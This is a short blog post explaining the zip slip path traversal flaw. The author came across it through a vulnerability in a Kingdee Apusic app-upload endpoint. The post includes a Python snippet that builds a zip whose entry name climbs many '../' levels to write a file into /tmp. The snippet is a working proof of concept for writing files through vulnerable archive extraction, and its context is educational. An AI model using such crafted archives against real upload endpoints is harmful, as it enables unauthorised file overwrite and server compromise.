所有的授权实战入侵网站已添加“如何入侵”标签,在侧边栏的归档中选择“如何入侵”即可查看所有文章

MENU

ZIP slip vulnerability

December 1, 2023 • Read: 2060 • 常山阅读设置

ZIP slip vulnerability

Today a workmate shared with me a vulnerability that called kingdee-Apusic-deployApp-upload. In this vul, I find request body is a zip file, but it's not successful that I want to modify this zip file in the request body. Finally, I found this vul is called zip-slip.

Directory traversal

I believe every programmer of cyber security knows about directory traversal vul. This vulnerability allows bypassing the application's access control by inserting ../. We can use ../ to access directories outside of the current directory, and download/read/write file in other directories.

Zip slip

zip slip is a type of directory traversal vul, We can upload a evil zip file, if the file is extracted, we will write a file into a directory where we intend.

How to create a zip file with zip slip? I find codes from zhihu

import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'sec_test.txt'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../../../../../../../../tmp/sec_test.tmp')

This code creates a zip file named out.zip. And we can upload this zip file to the web which have directory traversal vul, and the zip file is extracted, and a file will be written into a directory.

Archives QR Code Tip
QR Code for this page
Tipping QR Code